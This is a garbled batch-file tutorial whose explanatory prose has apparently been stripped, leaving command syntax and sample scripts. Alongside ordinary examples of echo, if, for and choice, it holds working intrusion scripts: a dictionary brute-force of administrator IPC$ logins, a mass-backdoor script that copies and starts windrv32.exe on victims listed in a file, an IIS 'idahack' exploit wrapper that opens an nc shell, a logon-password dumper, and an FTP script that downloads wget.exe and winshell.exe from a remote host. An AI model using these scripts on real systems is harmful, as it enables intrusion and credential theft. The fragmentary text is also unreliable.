
1.

Echo

echo

echo [{on|off}] [message]


Sample: echo off / echo hello world
> >> ^
.
2 @
@

Sample: @echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format /y autoset
/y )
3

Goto

goto label label


Sample
if {%1}=={} goto noparms
if {%2}=={} goto noparms if%1%2
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
goto

4.Rem
C /*--------*/,

Rem Message
Sample: @Rem Here is the description.
5.Pause
Pause
Press any key to continue . . .
Sample
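@echo off
rem Copy every file from the disk in drive A: into D:\BACK, then loop so the
rem next disk can be inserted. There is no exit label: the loop runs until the
rem user breaks out at the pause prompt (Ctrl+C / Ctrl+Break).
:begin
rem The drive letter needs its colon: "d\back" is a relative path on the
rem current drive, not the D:\BACK directory the description refers to.
copy a:*.* d:\back
echo Please put a new disk into driver A

pause
goto begin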
A d:\back
A pause
6.Call
call
Call

call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

[Drive:}[Path] FileName
filename .bat .cmd
7.start
DOS start

MIN
SEPARATE 16 Windows
HIGH HIGH
REALTIME REALTIME
WAIT
parameters /
32- GUI CMD.EXE

8.choice
choice /c:c:
1234
: choice /c:dme defrag,mem,end

defrag,mem,end[D,M,E]?
Sample
Sample.bat :
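@echo off
rem Menu driven by CHOICE: the keys d, m, e set ERRORLEVEL to 1, 2, 3.
choice /c:dme defrag,mem,end
rem "if errorlevel N" is true for any ERRORLEVEL >= N, so the tests must run
rem from the highest value down and each value must jump to its own label
rem (d -> defrag, m -> mem, e -> end, as described below). The original had
rem 3 -> defrag and 1 -> end swapped and misspelt "errorlevel" on the last test.
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye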
defrag,mem,end[D,M,E]? d m e if d
defrag m mem e end
goto end end good bye
9.If
if :
1if "" == ""
(
if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2if exist

if exist config.sys edit config.sys


3if errorlevel / if not errorlevel

if errorlevel 2 goto x2
DOS DOS errorlevel 01
10.for
for
FOR %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable
(set)
command
command-parameters
FOR %%variable
%variable %i %I
FOR
:
FOR /D %variable IN (set) DO command [command-parameters]


FOR /R [[drive:]path] %variable IN (set) DO command [command [drive:]path
FOR /R
(.)
FOR /L %variable IN (start,step,end) DO command [command-para

(1,1,5) 1 2 3 4 5(5,-1,1)
(5 4 3 2 1)
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
usebackq :
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset filenameset

For /F
"options"

:
eol=c - ()
skip=n -
delims=xxx -

tokens=x,y,m-n -
for
nth m

usebackq - :


fi

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
myfile.txt
for /
for %i
%j %k

usebackq

%i for %j %k
tokens= tokens=
26 z
Z FOR
52
FOR /F
filenameset

FOR /F
filenameset
CMD.EXE
:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

FOR
:
~I - (") %I
%~fI - %I
%~dI - %I
%~pI - %I
%~nI - %I
%~xI - %I

%~sI -
%~aI - %I
%~tI - %I /
%~zI - %I
%~$PATH:I - %I

:
%~dpI - %I
%~nxI - %I
%~fsI - %I
%~dp$PATH:i - %I

%~ftzaI - %I DIR
%I PATH %~
FOR %I

MS For
sample2
For Win2k
net use \\ip\ipc$ "password" /u:"administrator"
for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
i% admin dict.txt i% net use
find
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ": ">>D:\ok.txt
ko
sample3

FOR %%variable
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens sample1 victim.txt door.bat
%i %j %k

cultivate.bat net use IPC$ copy victimIf


errorlever = echo echo
delims= vivtim.txt victim.txt
%%i %%j %%k ip password username

--------------- cut here then save as a batchfile(I call it main.bat ) -------------------@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) -------------------------------------- cut here then save as a batchfile(I call it door.bat) ----------------@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) ------------------Windrv32.exe,PSexec.exe
.
,:+DDOS ,,
().,.

BAT
DOS
DOS DOS Edit Windows
(notepad)
(if)(goto)
(for)
C

DOS

DOS
DOS (path)
bat batch C:\BATCH
path c:\batch

DOS Win9x/Me C: AUTOEXEC.BAT


Windows 98 autoexec.bat
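@ECHO OFF
REM Search path for the Windows 98 command line. The listing had this
REM statement wrapped over three lines; split like that, a bare "PATH" only
REM prints the current path and the following line is run as a command.
REM The statement must stay on one line.
PATH C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH
REM LH (LOADHIGH) loads the resident tools into upper memory.
LH SMARTDRV.EXE /X
LH DOSKEY.COM /INSERT
LH CTMOUSE.EXE
REM Scratch directory for programs that honour TEMP / TMP.
SET TEMP=D:\TEMP
SET TMP=D:\TEMP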

wps > DOS

C:\>cd wps
C:\WPS>spdos
C:\WPS>py
C:\WPS>wbx
C:\WPS>wps
WPS
runwps.bat

@echo off
rem runwps.bat: the same steps as the session typed at the prompt above
rem (cd wps, spdos, py, wbx, wps), collected into one batch file.
c:
cd\wps
rem Start the three helper programs, then WPS itself, in the order used at
rem the prompt. What each helper provides is not explained in this extract.
spdos
py
wbx
wps
rem Back to the root directory once WPS exits.
cd\
wps runwps

echo@callpauserem(:: rem)

echo
echo off
@ echo off

call call

pause Press any key to continue...

rem

1 edit a.bat c:\a.bat


a.txt UCDOS WPS
:
@echo off
dir c:\*.* >a.txt c a.txt
call c:\ucdos\ucdos.bat ucdos
echo ""
pause ,
rem wps wps
cd ucdos ucdos
wps wps

C DOS
"%"
%[1-9] Tab
%0 %9%0 %1 %9

2C: f.bat
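@echo off
rem f.bat: format the drive named by the first parameter (f a: -> format a:).
rem FORMAT is destructive, so refuse to run when no drive was given instead
rem of invoking it with an empty argument.
if "%1"=="" goto usage
format %1
goto end
:usage
echo Usage: f drive:
:end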
C:\>f a:
f.bat %1 a: format %1 format a:
format a:
3C: t.bat:
@echo off
rem t.bat: display the two files named on the command line
rem (t a.txt b.txt types a.txt, then b.txt). %1 and %2 are the first and
rem second parameters.
type %1
type %2
C:\>t a.txt b.txt
%1 : a.txt
%2 : b.txt
a.txt b.txt

if goto choice for

if :
1if [not] "" == ""
(not )

if "%1"=="a" format a:
2if [not] exist [\]

: if exist c:\config.sys type c:\config.sys


c:\config.sys
3if errorlevel <>
DOS ()
if errorlevel (
)

if errorlevel 2 goto x2
goto goto ( label:
)goto if
:
rem goto jumps to the line that starts with ":end". The label line itself is
rem not executed, so the echo below is the next command that runs.
goto end
:end
echo this is the end
":"
choice
errorlevel if errorlevel
choice DOS Windows choice
choice /?
choice Windows 2003 choice choice

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]
:

:
/C choices "YN"
/N

/CS
/T timeout 0 9999 0

/D choice nnnn /C ;
/T nnnn
/M text
/?
:

ERRORLEVEL 1
2
255 ERRORLEVEL Ctrl+Break Ctrl+C
0 ERRORLEVEL ERRORLEVEL

:
CHOICE /?
CHOICE /C YNC /M " Y N C"
CHOICE /T 10 /C ync /CS /D y
CHOICE /C ab /M " 1 a 2 b"
CHOICE /C ab /N /M " 1 a 2 b"
CHOICE /C YNC /M " Y N C"

Y N C [Y,N,C]?
test.bat if errorlevel :
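@echo off
rem Menu driven by CHOICE (Windows 2003 syntax, /C keys and /M prompt text):
rem the keys d, m, e set ERRORLEVEL to 1, 2, 3.
choice /C dme /M "defrag,mem,end"
rem "if errorlevel N" is true for any ERRORLEVEL >= N, so test from the
rem highest value down. The last test was misspelt "errotlevel" in the
rem original, which is a syntax error rather than a comparison.
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye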
"defrag,mem,end[D,M,E]?" d m e if
d defrag m mem
e end goto end end
good bye
for

FOR %%variable IN (set) DO command [command-parameters]


%%variable
(set)
command
command-parameters
:
rem Type every .bat and .txt file in the current directory. %%c is the loop
rem variable; the % is doubled because the line is in a batch file rather
rem than typed at the prompt.
for %%c in (*.bat *.txt) do type %%c
bat txt

1. IF-EXIST
1)
C:\ test1.bat
@echo off
rem test1.bat: if \AUTOEXEC.BAT exists in the root of the current drive,
rem display it; otherwise report that it is missing. Exactly one of the two
rem IF lines fires.
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

C:\>TEST1.BAT
C:\ AUTOEXEC.BAT

2)
test2.bat
@ECHO OFF
REM test2.bat: same as test1.bat, but the file name comes from the first
REM parameter (test2 AUTOEXEC.BAT). %1 is substituted before each line runs.
IF EXIST \%1 TYPE \%1
IF NOT EXIST \%1 ECHO \%1 does not exist
:
C:\>TEST2 AUTOEXEC.BAT

(1) IF EXIST
IF EXIST [+]
(2) test2.bat %1 DOS 9 %1~
%9(%0 test2 ) %1
AUTOEXEC.BAT
3) TEST3.BAT
@echo off
rem test3.bat: each IF checks one positional parameter. A parameter that was
rem not supplied expands to nothing, so its comparison is simply false
rem (test3 A B prints XIAO and TIAN only).
IF "%1" == "A" ECHO XIAO
IF "%2" == "B" ECHO TIAN
IF "%3" == "C" ECHO XIN

C:\>TEST3 A B C
:
XIAO
TIAN
XIN

C:\>TEST3 A B

XIAO
TIAN
DOS %3
2IF-ERRORLEVEL
TEST4.BAT
@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO


IF ERRORLEVEL 0 ECHO
:
C:\>TEST4
""""
IF ERRORLEVEL DOS

@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 0 ECHO
IF ERRORLEVEL 1 ECHO
IF ERRORLEVEL 2 ECHO ctrl-c
IF ERRORLEVEL 3 ECHO
IF ERRORLEVEL 4 ECHO

ctrl-c

backup
0
1
2
3 ctrl-c
4
diskcomp
0
1
2 ctrl-c
3
4
diskcopy
0
1 /
2 ctrl-c
3
4
format
0
3 ctrl-c
4
5 "proceed with format (y/n)?" n

xcopy
0
1
2 ctrl-c
4
5
3IF STRING1 == STRING2
TEST5.BAT
@echo off
rem test5.bat: string comparison on a parameter. Drive A: is formatted only
rem when the first parameter is exactly "A" (the comparison is case-sensitive;
rem the command name "formAT" is not). A destructive command keyed on an
rem argument like this should be guarded, as test1-test3 do with IF EXIST.
IF "%1" == "A" formAT A:

C:\>TEST5 A
A:

if [%1]==[A] if %1*==A*
5GOTO
TEST6.BAT
@ECHO OFF
REM test6.bat: copy C:\AUTOEXEC.BAT to D:\ only if it exists. GOTO skips the
REM copy block when the file is missing; both paths finish at :_DONE.
IF EXIST C:\AUTOEXEC.BAT GOTO _COPY
GOTO _DONE
:_COPY
COPY C:\AUTOEXEC.BAT D:\
:_DONE

(1) ASCII ":"


(2)
(3) DOS
6FOR
C:\TEST7.BAT
@ECHO OFF
REM test7.bat: type every .BAT, .TXT and .SYS file in the current directory.
REM The loop variable is written %%C because this runs from a batch file.
FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

C:>TEST7
C: BATTXTSYS

win2000 BAT

1.
2.
3. ()
4.
5. 1 tmp.txt
6. 2 sample.bat

###########################
1.
###########################
rem Built-in help for the commands used in this tutorial. "ver" prints the
rem Windows version; each "command /?" prints that command's usage text.
ver
cmd /?
set /?
rem /?
if /?
echo /?
goto /?
for /?
shift /?
call /?

type /?
find /?
findstr /?
copy /?

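rem Collect the version string and the built-in help of every command in the
rem list above into tmp.txt, then display the file. Each "echo name /?" line
rem writes a heading so the sections can be told apart. The first redirection
rem uses > (create or truncate); every later one uses >> (append).
echo ver >tmp.txt
ver >>tmp.txt
echo cmd /? >>tmp.txt
cmd /? >>tmp.txt
rem set /? and echo /? are in the list above but were missing from this dump.
echo set /? >>tmp.txt
set /? >>tmp.txt
echo rem /? >>tmp.txt
rem NOTE(review): cmd.exe parses a line starting with rem specially; if the
rem REM help does not show up in tmp.txt, run "rem /?" on its own instead.
rem /? >>tmp.txt
echo if /? >>tmp.txt
if /? >>tmp.txt
echo echo /? >>tmp.txt
echo /? >>tmp.txt
echo goto /? >>tmp.txt
goto /? >>tmp.txt
echo for /? >>tmp.txt
for /? >>tmp.txt
echo shift /? >>tmp.txt
shift /? >>tmp.txt
echo call /? >>tmp.txt
call /? >>tmp.txt
echo type /? >>tmp.txt
type /? >>tmp.txt
echo find /? >>tmp.txt
find /? >>tmp.txt
echo findstr /? >>tmp.txt
findstr /? >>tmp.txt
echo copy /? >>tmp.txt
copy /? >>tmp.txt
type tmp.txt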

#############################
2.
#############################
C:\Program Files>set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=FIRST
ComSpec=C:\WINNT\system32\cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User
windir=C:\WINNT
path: . copy
%windir%\system32\. . .
: copy mychenxu.exe %windir%\system32\.
(.)
(,)
%windir%
%%windir%% .

%temp%
%windir%
%errorlevel%
..
. ("") program file
C:\>dir p*
C:\
2000-09-02 11:47 2,164 PDOS.DEF
1999-01-03 00:47 <DIR> Program Files
1 2,164
1 1,505,997,824

C:\>cd pro*
C:\Program Files>
C:\>
C:\>cd "Program Files"
C:\Program Files>
############################################
3. ()
############################################

con nul aux \ / | || && ^ > < *


You can use most characters as variable values, including white space. If you use the special
characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks.
If you use quotation marks, they are included as part of the value because everything following the
equal sign is taken as the value. Consider the following examples:
(: ^."")
To create the variable value new&name, type:
set varname=new^&name
To create the variable value "new&name", type:
set varname="new&name"
The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by
the escape character (^) or quotation marks when you pass them as arguments.
find "Pacific Rim" < trade.txt > nwtrade.txt
IF EXIST filename. (del filename.) ELSE echo filename. missing
>
>>
@ . cmd , echo off
^ ( > < &). aaa bbb
echo 123456 ^> aaa
echo 1231231 > bbb
()
(echo aa & echo bb)
, .
; ,
:
|
& Usage & [& ...]

dir c:\*.exe & dir d:\*.exe & dir e:\*.exe


&& Usage && [&& ...]

|| Usage || [|| ...]

IF [NOT] ERRORLEVEL number command para1 para2


IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2
IF EXIST filename command para1 para2
IF NOT EXIST filename command para1 para2
IF "%1"=="" goto END
IF "%1"=="net" goto NET
IF NOT "%2"=="net" goto OTHER
IF ERRORLEVEL 1 command para1 para2
IF NOT ERRORLEVEL 1 command para1 para2
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k
ijklmnopq .
eol=c - ()
skip=n -
delims=xxx -
########################
4.
########################
rem > creates a.txt (or truncates it) and writes one line.
echo This is test > a.txt
type a.txt
rem >> appends, so a.txt now holds two lines.
echo This is test 11111 >> a.txt
type a.txt
rem > again replaces the whole file; only the 22222 line remains.
echo This is test 22222 > a.txt
type a.txt
echo
echo a.txt a.txt
netstat -n | find "3389"
3389 ip.
________________test.bat______
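@echo please care
rem There is no "echo off" in this file, so each of the next three command
rem lines is printed before its own output and appears twice on screen.
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
rem The @ prefix suppresses the echo of that one command line only.
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem A comment line: with echo on it is still displayed.
@rem The same comment, hidden by the @ prefix.
rem Each if/else must stay on one line. The listing had the else branch
rem wrapped after "Not find"; cmd.exe treats an unclosed "(" at the end of a
rem line as the start of a multi-line block, so the wrapped text would be
rem parsed as two commands and "find.exe" would be executed, not printed.
@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
rem "fina.exe" is presumably a deliberately wrong name so the else branch runs.
@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)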

_____________________________
idahack ida ..
___________________ida.bat_____
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"
@if "%1" =="" goto USAGE
@if NOT "%2" =="" goto SP2
:start
@echo Now start ...
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [goog luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:SP2
@idahack.exe %1 80 %2 99 %temp%\_tmp
@type %temp%\_tmp
@find "good luck :)" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
_____________________ida.bat__END_______
. administrator .
..
___________________________fpass.bat____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"
@echo start....
@echo ____________________________________
@if "%1"=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt
@echo "prog exit code [%errorlevel%] findpass.exe"
@type %temp%\_findpass.txt
@echo ________________________________Here__pass
@ipconfig /all >>%temp%\_findpass.txt

@goto END
:USAGE
@pulist.exe >%temp%\_pass.txt
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt
@echo "Example: fpass.bat %1 %2 %3 %4 !!!"
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"
:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
_________________fpass.bat___END_______________________________________________
____________
telnet .(win)
. .Ctrl+V . !!
echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
